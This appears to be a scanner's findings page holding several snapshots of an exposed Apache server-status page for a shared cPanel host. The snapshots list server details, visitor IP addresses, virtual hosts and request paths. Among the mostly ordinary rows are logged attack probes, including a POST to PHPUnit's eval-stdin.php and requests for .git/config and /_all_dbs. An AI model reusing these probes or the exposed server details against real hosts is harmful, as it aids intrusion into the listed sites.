      0-9126910/205/8620_
      26.984182262687200.045.531186.73
      66.118.172.102http/1.1zed.sa:443GET /menu/wp-includes/js/wp-emoji-release.min.js?ver=6.5.4 HTTP
      
      0-9126910/143/9081_
      26.90440262103470.023.111143.28
      172.70.156.140http/1.1qr.brunch.ws:443GET /storage/food_image/17095843258766_sunyside.webp HTTP/1.1
      
      0-9126910/164/8740_
      27.00322176036040.037.661686.39
      52.167.144.216http/1.1jawad.com.sa:443GET /public/front_resources/vue/product_details.js HTTP/1.1
      
      0-9126910/154/8566_
      26.90440167748250.010.431568.14
      172.70.156.141http/1.1qr.brunch.ws:443GET /storage/food_image/17095845412546_avocadoposhedegg.webp HT
      
      0-9126910/233/8392_
      26.864404119106370.037.221124.75
      172.70.156.145http/1.1qr.brunch.ws:443GET /storage/food_image/17095847295383_shakshouka.jpg HTTP/1.1
      
      0-9126910/165/8483_
      26.57109146324140.020.881242.88
      178.254.29.124http/1.1
      
      0-9126910/235/8819_
      27.046125855631870.034.561530.36
      5.163.52.26http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/7SW7C958t5WkAz2Q0qySjd
      
      0-9126910/264/8882_
      26.7428686103042920.0118.121662.32
      66.249.75.167http/1.1
      
      0-9126910/191/8735_
      27.0291060136190.033.061494.88
      114.119.128.233http/1.13dvi.com:80GET /images/folio/thumbs/434638662263751.jpg HTTP/1.1
      
      0-9126910/145/8996_
      27.0214075466786860.019.331337.08
      141.164.161.118http/1.1albayan.edu.sa:443GET /images/slider/out.jpg HTTP/1.1
      
      0-9126910/174/8441_
      27.01236189221323120.024.441257.91
      198.203.28.218http/1.1sulaimaniya.edu.sa:443POST /wp-json/contact-form-7/v1/contact-forms/1500/feedback HTT
      
      0-9126910/312/8715_
      26.90440172402660.034.021343.07
      172.70.156.140http/1.1qr.brunch.ws:443GET /storage/food_image/17085190389947_img50a6ea78846249e9820d1
      
      0-9126910/154/8564_
      26.75179265049490.012.241397.00
      5.111.135.222http/1.1
      
      0-9126910/280/8757_
      26.94435961436210.026.511435.49
      172.70.156.141http/1.1qr.brunch.ws:443GET /storage/food_image/17162864712835_mocha.jpg HTTP/1.1
      
      0-9126910/199/8814_
      26.7951362935560.067.221614.02
      5.111.135.222http/1.1
      
      1-9277770/249/7925_
      42.28121091251800.068.141648.44
      128.234.52.4http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      1-9277770/327/8550_
      42.35603174834400.079.431538.66
      5.163.52.26http/1.1jawad.com.sa:443POST /api/v.1/front/related/product HTTP/1.1
      
      1-9277770/341/8745_
      42.22434575523380.034.811578.39
      172.70.156.147http/1.1qr.brunch.ws:443GET /storage/food_image/17088461776104_oip7.jpg HTTP/1.1
      
      1-9277770/284/8629_
      42.32705105681660.09.271109.69
      5.163.52.26http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      1-9277770/365/8288_
      42.19436573028880.036.561326.38
      172.70.156.148http/1.1qr.brunch.ws:443GET /storage/food_image/17088535024089_img94fe21be61cd47f8826a0
      
      1-9277770/536/8751_
      42.3713264427450.057.421229.54
      31.167.119.169http/1.1albayan.edu.sa:443GET /e_school/index.php?user=web HTTP/1.1
      
      1-9277770/353/8370_
      42.2815511594496580.016.941426.16
      172.70.42.198http/1.1support.daaris.com:443GET /index.php?language=ukranian&rp=%2Fknowledgebase%2Ftag%2Fsh
      
      1-9277770/359/8389_
      42.16
      Found on 2024-06-06 07:40
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7f3f75dd0

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 04-Jun-2024 14:50:41 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  12 days 10 hours 45 minutes 51 seconds
      Server load: 0.64 0.48 0.43
      Total accesses: 1750459 - Total Traffic: 268.8 GB - Total Duration: 2002592117
      CPU Usage: u794 s86.75 cu7463.93 cs1706.22 - .934% CPU load
      1.63 requests/sec - 262.0 kB/second - 161.0 kB/request - 1144.04 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 242 idle workers
      _____________________________________K_________________________K
      _____________________K_____________________________K_K_______WWW
      WWWWWWWWWWWWWWWWWWWWWW____________________________W_____________
      _______________________K__________________________________......
      ...................____________K____________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-955050/466/8445_
      47.9451166910570.064.181115.75
      172.69.103.153http/1.1qr.brunch.ws:443GET /assets/fonts/rb.ttf HTTP/1.1
      
      0-955050/347/7356_
      47.72383137101780.069.461191.00
      66.249.70.3http/1.1albayan.edu.sa:443GET /imgweb/bank1.docx HTTP/1.1
      
      0-955050/382/7586_
      47.97232151218690.024.38982.29
      66.249.93.73http/1.1jawad.com.sa:443GET /.well-known/traffic-advice HTTP/1.1
      
      0-955050/442/7717_
      47.80200712372247780.088.531124.91
      66.118.185.69http/1.1albayan.edu.sa:443GET /imgweb/1445/4th-5th-6th%20BS%20QB%20T3-2023-2024.pdf HTTP/
      
      0-955050/575/7996_
      47.7141843471664380.019.281100.28
      114.119.139.61http/1.1daris.live:80GET /product/66 HTTP/1.1
      
      0-955050/300/7377_
      47.84152055841320.089.061329.09
      188.53.190.245http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-955050/388/7651_
      47.82180299625600.0124.351379.50
      50.60.183.44http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-955050/385/7660_
      47.906755358753950.0181.201390.66
      51.36.11.37http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/________%20________%20
      
      0-955050/317/8316_
      47.723161861153860.094.141326.99
      54.36.148.233http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=236 HTTP/1.1
      
      0-955050/481/7933_
      47.94502958866670.073.911297.83
      51.36.11.37http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-955050/389/7778_
      47.742752255144430.059.18949.77
      20.184.34.83http/1.1jawad.com.sa:443POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1
      
      0-955050/446/8270_
      47.96392056769830.067.14898.68
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-955050/480/7849_
      47.8978157774750.083.821506.86
      51.36.11.37http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/5iNzFyqrxpDY5oiO2F4bRt
      
      0-955050/380/7689_
      47.861223358930120.066.361277.72
      66.249.70.5http/1.1albayan.edu.sa:443GET /albayan_library/index.php HTTP/1.1
      
      0-955050/315/7541_
      47.78200298184990.063.03984.04
      50.60.183.44http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-955050/393/7514_
      47.7524243739739180.090.481063.35
      114.119.128.233http/1.1daris.live:80GET /product/20 HTTP/1.1
      
      0-955050/328/7654_
      47.8888449318070.069.901297.10
      51.36.11.37http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/x4j8JXmTFqBFr2PBBlOxZX
      
      0-955050/415/7942_
      47.73282795882110.095.641427.65
      66.249.70.198http/1.1akg.sa:443GET /jiqui=925100&lu49VP=1238503/w/ HTTP/1.1
      
      0-955050/438/7805_
      47.84154754437110.0165.861371.74
      188.53.190.245http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-955050/332/7948_
      47.841744159050630.032.631232.03
      51.36.11.37http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      0-955050/371/7406_
      47.7624220216109480.061.881068.18
      51.36.11.37http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      0-955050/399/7754_
      47.87105364386070.039.881196.12
      51.36.11.37http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/S4DOkvfRENqbM93djJfkDC
      
      0-955050/436/7674_
      47.83183155620590.054.431290.63
      128.199.182.152http/1.1randalift.com.sa:80GET /_all_dbs HTTP/1.1
      
      0-955050/368/7850_
      47.9801547042880.022.641295.37
      51.36.11.37http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      0-955050/310/7789_
      47.9257357188640.0131.331458.61
      51.36.11.37http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/Uhbm4p22FoeNxeaf55sDWn
      
      1-960110/366/7008_
      48.12105184227580.0110.151463.55
      51.36.11.37http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/6WaLV9c1KzM2wYug3TgYb3
      
      1-960110/557/7589_
      48.0020016470241630.020.951382.58
      94.48.123.185http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-960110/386/7731_
      47.962791864563020.0121.191348.20
      54.36.148.7http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=656 HTTP/1.1
      
      1-960110/388/7606_
      47.913893102799200.024.87965.50
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717501451.98044705390930175781
      
      1-960110/418/7153_
      48.11151165587370.075.771200.62
      188.53.190.245http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/controls_bg.png HT
      
      1-960110/278/7448_
      48.1587560780530.015.011083.13
      51.36.11.37http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/0QyvrZ9vUTw8idh5IZhdmV
      
      1-960110/351/7430_
      48.19602793189330.0112.541248.93
      51.36.11.37
      Found on 2024-06-04 11:50
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df723fab3a5

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 04-Jun-2024 12:06:28 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  12 days 8 hours 1 minute 38 seconds
      Server load: 0.37 0.40 0.42
      Total accesses: 1734505 - Total Traffic: 265.5 GB - Total Duration: 1986781446
      CPU Usage: u721.27 s70.85 cu7463.93 cs1706.22 - .935% CPU load
      1.63 requests/sec - 261.2 kB/second - 160.5 kB/request - 1145.45 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 242 idle workers
      ____________________________________K___________________________
      _____R________________K____________________K_________________WWW
      WWWWWWWWWWWWWWWWWWWWWWK_________________________________________
      _K____________________________________________________W___......
      ...................____________________K____....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-955050/421/8400_
      39.28380566887650.062.461114.03
      217.113.194.251http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1735&t=217.113.194.251&c=5 HT
      
      0-955050/295/7304_
      39.33225137050050.066.261187.79
      176.224.74.53http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/buttons.png HTTP/1
      
      0-955050/278/7482_
      39.31234037971890.015.88973.79
      114.119.139.123http/1.13dvi.com:80GET /view_portfolio.php?ID=39 HTTP/1.1
      
      0-955050/360/7635_
      39.312734372115680.083.841120.23
      217.113.194.251http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1707&t=217.113.194.242&c=5 HT
      
      0-955050/437/7858_
      39.34156671639540.017.671098.68
      217.113.194.246http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1345&t=217.113.194.151&c=5 HT
      
      0-955050/244/7321_
      39.3832455805860.087.701327.73
      217.113.194.245http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1691&t=217.113.194.71&c=5 HTT
      
      0-955050/266/7529_
      39.331926298448070.0115.501370.64
      104.248.150.85http/1.1trynidaa.com:443GET /wp-login.php HTTP/1.1
      
      0-955050/339/7614_
      39.29356458071230.034.381243.84
      217.113.194.253http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1527&t=217.113.194.79&c=5 HTT
      
      0-955050/270/8269_
      39.35100560372730.091.291324.14
      217.113.194.245http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1423&t=217.113.194.83&c=5 HTT
      
      0-955050/363/7815_
      39.16166258675520.070.521294.44
      159.65.176.160http/1.1
      
      0-955050/335/7724_
      39.254282252808530.025.37915.96
      2.90.104.144http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      0-955050/388/8212_
      39.27409456678320.063.26894.80
      217.113.194.247http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1721&t=217.113.194.243&c=5 HT
      
      0-955050/428/7797_
      39.25422457477960.079.631502.67
      217.113.194.249http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1689&t=217.113.194.66&c=5 HTT
      
      0-955050/292/7601_
      39.28386458869360.020.081231.44
      5.82.166.142http/1.1jawad.com.sa:443GET /public/front_resources/css/owl.carousel.min.css HTTP/1.1
      
      0-955050/268/7494_
      39.12267298063470.042.15963.16
      141.164.184.78http/1.1
      
      0-955050/360/7481_
      39.30335165939606750.063.611036.48
      37.242.104.86http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%B1%D9%8A%D8%A7%D8%B6%
      
      0-955050/257/7583_
      39.302948548502960.065.841293.04
      114.119.150.158http/1.1daris.live:443GET /product/part/63/252 HTTP/1.1
      
      0-955050/371/7898_
      39.21449195667750.088.861420.86
      2.90.110.158http/1.1albayan.edu.sa:443GET /apple-touch-icon.png HTTP/1.1
      
      0-955050/399/7766_
      39.396454229660.0164.401370.28
      217.113.194.245http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1728&t=217.113.194.82&c=5 HTT
      
      0-955050/252/7868_
      39.35133558695600.030.091229.49
      217.113.194.254http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1720&t=217.113.194.90&c=5 HTT
      
      0-955050/332/7367_
      39.341450214873670.024.021030.33
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-955050/354/7709_
      39.3672264348230.038.011194.24
      51.36.232.122http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-955050/375/7613_
      39.33175055029230.050.141286.34
      66.249.64.33http/1.1albayan.edu.sa:80GET /imgweb/cur41/9th/9th%20Reading%20WB%20T1%2019.pdf HTTP/1.1
      
      0-955050/290/7772_
      39.244313846979250.019.051291.78
      162.240.51.185http/1.1new-filter.jawad.com.sa:443GET / HTTP/1.1
      
      0-955050/267/7746_
      39.3857555116720.061.971389.25
      176.224.74.53http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      1-960110/317/6959_
      40.63167278270790.047.021400.43
      159.65.176.160http/1.1
      
      1-960110/527/7559_
      40.96190070216290.020.121381.75
      66.249.64.34http/1.1albayan.edu.sa:80GET /albayan_library/upload/books/______%20______%20________.pd
      
      1-960110/319/7664_
      40.9984564501990.0118.451345.46
      217.113.194.245http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1423&t=217.113.194.249&c=5 HT
      
      1-960110/330/7548_
      40.794144102748230.022.35962.99
      154.54.249.208http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1689&t=217.113.194.250&c=5 HT
      
      1-960110/327/7062_
      40.9813923065500790.073.441198.29
      66.249.64.164http/1.1akg.sa:443GET /?TrCFVta/haddocker1196895/5AKvLDV HTTP/1.1
      
      1-960110/236/7406_
      40.981091060706490.011.861079.97
      217.113.194.252http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1739&t=217.113.19
      Found on 2024-06-04 09:06
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df714e133cd

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 02-Jun-2024 19:18:10 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  10 days 15 hours 13 minutes 21 seconds
      Server load: 0.33 0.40 0.40
      Total accesses: 1477829 - Total Traffic: 211.9 GB - Total Duration: 1606459037
      CPU Usage: u590.62 s50.97 cu6374.14 cs1410.02 - .917% CPU load
      1.61 requests/sec - 241.9 kB/second - 150.4 kB/request - 1087.04 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 238 idle workers
      __K___R______________________________________K____.W............
      ...........__________K_______________K_______________________WWW
      WWWWWWWWWWWWWWWWWWWWWW.........................______________K__
      __________________K__________________________K__________________
      _________________K________________________________KR____W_______
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8284830/110/7206_
      12.65255153229920.010.47927.56
      35.222.190.7http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/10/WhatsApp-Image-2021-09-05-at-12
      
      0-8284830/96/6201_
      12.692448025852360.040.03954.44
      172.70.158.142http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8284831/78/6427K
      12.78458328553232.212.08858.11
      106.55.201.50http/1.13dvi.com:443GET / HTTP/1.1
      
      0-8284830/60/6333_
      12.682482363677610.010.00873.17
      35.187.132.162http/1.1sulaimaniya.edu.sa:443GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP
      
      0-8284830/97/6561_
      12.76156061662710.07.75952.44
      3.128.203.192http/1.1albayan.edu.sa:80GET / HTTP/1.1
      
      0-8284830/50/6185_
      12.5829223949469590.027.191086.50
      3.81.62.149http/1.1daris.live:443GET / HTTP/1.1
      
      0-8284830/108/6428R
      12.53313248571960.07.18995.91
      176.224.73.240http/1.1
      
      0-8284830/171/6522_
      12.72190346276850.07.151021.84
      34.86.212.119http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-8284830/73/7091_
      12.1426268952183860.06.321068.84
      46.101.123.227http/1.1
      
      0-8284830/124/6423_
      12.58294347528440.05.931020.17
      54.36.148.201http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=2584 HTTP/1.1
      
      0-8284830/147/6504_
      12.52153239749420.09.11765.62
      188.54.65.239http/1.1
      
      0-8284830/107/7086_
      12.75170348133260.016.31699.67
      117.33.163.216http/1.1hawsab.me:80GET / HTTP/1.1
      
      0-8284830/164/6600_
      12.68248248515270.035.931221.65
      35.187.132.160http/1.1sulaimaniya.edu.sa:443HEAD /wp-content/plugins/rdv-timetable/packages/color-mix/color
      
      0-8284830/124/6363_
      12.57295348473330.04.851084.70
      188.54.65.239http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      0-8284830/59/6543_
      12.672533481456010.018.79803.59
      72.14.201.95http/1.1albayan.edu.sa:443GET /web/250.html2 HTTP/1.1
      
      0-8284830/116/6362_
      12.7616025532350480.031.43896.62
      66.118.151.19http/1.1albayan.edu.sa:443GET /imgweb/1445/7th-T3-BS%20-QB-24.pdf HTTP/1.1
      
      0-8284830/83/6378_
      12.77108936593510.05.311025.10
      37.217.58.48http/1.13dvi.com:443GET /v/sibaqulhorof/ HTTP/1.1
      
      0-8284830/81/6503_
      12.77139376830890.013.861050.53
      18.118.114.155http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-8284830/100/6603_
      12.751892742992430.022.641058.41
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-8284830/204/6809_
      12.5926114247592620.08.85945.85
      35.187.132.174http/1.1sulaimaniya.edu.sa:80HEAD / HTTP/1.1
      
      0-8284830/64/6308_
      12.691950205932200.03.09794.14
      35.187.132.3http/1.1albayan.edu.sa:80HEAD / HTTP/1.1
      
      0-8284830/65/6495_
      12.5927216749953450.03.491042.10
      188.54.65.239http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-8284830/76/6396_
      12.66259350036460.03.961118.39
      54.36.148.141http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=2691 HTTP/1.1
      
      0-8284830/72/6657_
      12.692266738408230.025.271016.14
      172.70.158.149http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8284830/142/6679_
      12.592655541428340.04.581101.06
      161.35.215.102http/1.13dvi.com:443GET / HTTP/1.0
      
      1-8290400/64/5773_
      10.1513910069698140.03.301111.90
      172.70.158.142http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      1-8290400/45/6130_
      10.141716958759770.034.151112.19
      199.45.154.27http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      1-8290400/191/6630_
      10.199411946045020.02.501072.29
      78.153.140.177http/1.1php.we3dvi.com:80\x16\x03\x01\x01H\x01
      
      1-8290400/80/6448_
      10.1515811888176980.010.04809.41
      66.118.151.19http/1.1albayan.edu.sa:443GET /imgweb/1445/7th-T3-BS%20-QB-24.pdf HTTP/1.1
      
      1-8290400/61/5996_
      10.10247257049210.05.71971.01
      35.187.132.161http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/simple-file-list/js/ee-uploader.js?ver=
      
      1-8290400/54/6321_
      10.10248255776120.04.26883.90
      35.187.132.161http/1.1sulaimaniya.edu.sa:443GET /wp-includes/js/jquery/ui/effect.min.js?ver=1.13.2 HTTP/1.1
      
      1-8290400/83/6273_
      10.09249272543240.06.161011.04
      35.187.132.162http/1.1sulaimaniya.edu.sa:443HEAD /wp-includes/js/jquery/ui/effect.min.js?ver=1.13.2 HTTP/1.
      
      1-8290400/106/6424_
      10.002761143727340.013.76823.04
      54.36.148.171http/1.1albayan
      Found on 2024-06-02 16:18
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7fb4d268c

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 02-Jun-2024 08:16:01 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  10 days 4 hours 11 minutes 12 seconds
      Server load: 0.56 0.52 0.47
      Total accesses: 1396037 - Total Traffic: 199.6 GB - Total Duration: 1528732087
      CPU Usage: u597.66 s52.75 cu6009.54 cs1337.12 - .91% CPU load
      1.59 requests/sec - 238.1 kB/second - 149.9 kB/request - 1095.05 ms/request
      17 requests currently being processed, 0 workers gracefully restarting, 233 idle workers
      ________________R_______K_______K______________________________W
      _________K_______________K____K______R_______________________WWW
      WWWWWWWWWWWWWWWWWWWWWW_R___K______________________K__K__________
      _______________________K__K______.........................______
      _____________K________________________KK____....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8128400/7/6866_
      1.802251645970.00.04895.32
      31.167.119.169http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      0-8128400/5/5876_
      1.6436886324295060.00.21891.66
      193.143.1.119http/1.1ucc.thenewjeddah.com:443GET /api/v1/.git/config HTTP/1.1
      
      0-8128400/8/6078_
      1.65347229013160.00.20793.77
      171.33.132.16http/1.1zed.sa:80POST /wordpress/xmlrpc.php HTTP/1.1
      
      0-8128400/5/6076_
      1.023561363323840.00.68831.18
      92.205.1.133http/1.1
      
      0-8128400/5/6223_
      1.64367160905170.00.02935.28
